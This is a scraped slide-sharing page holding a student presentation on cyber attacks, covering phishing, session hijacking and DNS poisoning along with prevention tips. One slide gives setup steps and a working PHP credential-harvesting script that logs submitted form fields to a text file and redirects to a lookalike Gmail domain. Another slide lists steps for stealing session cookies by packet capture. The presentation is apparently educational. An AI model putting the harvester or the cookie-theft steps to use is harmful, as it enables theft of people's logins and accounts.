Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manual
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.
 

Recently uploaded

Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...christianmathematics
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfAyushMahapatra5
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 

Recently uploaded (20)

Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 

Attacks on the cyber world

  • 1. ATTACKS ON THE CYBER WORLD BY: NIKHIL TRIPATHI(12MCMB10) TARUN MEHROTRA(12MCMB11) SUDHIR KUMAR PANDEY(12MCMB14 )
  • 2. FLOW OF CONTENTS  INTRODUCTION  TYPES OF ATTACKS  SOCIAL ENGINEERING  PHISHING  SESSION HIJACKING  DNS SPOOFING  CONCLUSION  REFERENCES
  • 3. INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds—
  • 4. INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds— HOW MUCH WE ARE SECURE?????
  • 5. VARIOUS ATTACKS •More or less, hundreds of exploits are there which hackers practice on the individual hosts or even on the whole network. •Some of the most popular and dangerous attacks are: > SESSION HIJACKING (SNIFFING). > PHISHING. > DOS ATTACK (SMURFING). > DNS POISONING(DNS SPOOFING). > SQL INJECTION. > FAKE EMAILING AND EMAIL BOMBING. > TROJAN HORSES, KEYLOGGERS and many more….
  • 6. SOCIAL ENGINEERING •Art of manipulating people into performing actions or divulging confidential information. •An art of DECEPTION. •Varies from purely technical to purely non-technical. •Depends upon the victim’s cyber knowledge. •Depends upon till what extent attacker is spoofing its identity. •Result of human’s unawareness about the cyber crimes. •Initiation of almost all the cyber attacks practiced nowadays. •One of the most dangerous and most effective technique. •PHISHING is an example of technical social engineering.
  • 7. PHISHING •Act of attempting to acquire information such as usernames, passwords, by masquerading as a trustworthy entity in an electronic communication. •Started in late 90’s. •Named after the earlier hackers, known as phreakers… •Still, the most effective and most dangerous social-engineering attack. •Overall cost due to online fraud by phishing reached to 3 Billion $ in 2007. •In 2011, it reached the peak of 94 Billion $. •Main reason for growth in phishing scam is the users’ unawareness.
  • 9. HOW IT WORKS? Components of Phishing are:- •A fake page •A PHP script to redirect user to the original page containing some notifications •The redirected original page along with some notification •The generated text file having username and password
  • 11.
  • 12. Working(contd.) •Change the redirected url to the url of PHP file and make sure that both the fake page and PHP script is present within the same directory. •Change the method from POST to GET. •PHP code:- <?php header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>
  • 13.
  • 14.
  • 15. HOW TO PREVENT PHISHING? 1. The most basic thing is to see the lock beside the url field of the browser. 2. Check the url. 3. Check the certificate allotted to the company by the authorized party. E.g. Thawte Consulting in case of Google. 4. If possible, enter the IP address for the gmail.com instead of the domain name. Its time taking but far secure for phishing and DNS poisoning to happen. But what if it is combined with other attacks?
  • 16. SESSION HIJACKING •Used to refer to the theft of a magic cookie responsible to authenticate a user to a remote server. •Some basic methods to implement the attack: Session fixation, Cross-site scripting and the most popular one- Session sidejacking . •Started in 2004 and gained popularity among the hackers like a wildfire. •American National agencies faced million dollars losses due to this attack. •Falls into the category of the deadliest attacks due to occurrences of huge losses. •Can be implemented by first capturing the packets and then analyzing it. •Cain & Abel is popular for capturing and APR and Wireshark/Ettercap is popular for analyzing the packets.
  • 17. HOW IT WORKS? 1. Applicable only if using LANs for accessing the internet. 2. Victim access the internet by accessing the default gateway. 3. Attacker sitting in the same network captures the packet going from victim’s machine to the default gateway and vice-versa. 4. Now, after capturing, attacker analyze the packets and read the cookies. 5. Next, attacker copies those cookies and set it into his/her browser. 6. That’s it. Now, he’ll get access to user’s account.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24. HOW TO PREVENT SESSION HIJACKING? 1. If possible, never use any shared network to access your accounts. 2. Otherwise, log out after every few seconds, but it seems impossible. 3. The best way is that web servers should use time stamped cookies but it is still in somewhat, testing phase. 4. Otherwise, use HTTPs to encrypt the traffic. But what if attacker intentionally downgrades your HTTPs connection to HTTP!!!
  • 25. DNS POISONING • An attack where victim’s machine gets fooled and redirected to some other server rather than the desired server. •Also called DNS spoofing. •Attacker poisons the DNS cache entry so it starts giving false results. •Cain & Abel can be used for this purpose by using MAN-IN-THE-MIDDLE attack. •Being an insecure protocol, any host can resolve the query generated by a user.
  • 27. HOW TO PREVENT DNS POISONING? •The only way to prevent DNS poisoning is by making this protocol a secure one. Research is still going on in this field under the brolly of Verisign Inc. •The new protocol will be named as DNSSEC(Domain Name System Security Extension). •http://verisigninc.com is the only domain yet which we found as DNSSEC enabled. •DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS packets. •DNSSEC will generate more TCP traffic. •DNSSEC requires support for EDNS0. •Thus, a huge change will be required before DNSSEC implementation.
  • 28. CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is---
  • 29. CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is--- STAY AWAY FROM INTERNET!!! Its not the proper answer, but at least, its true….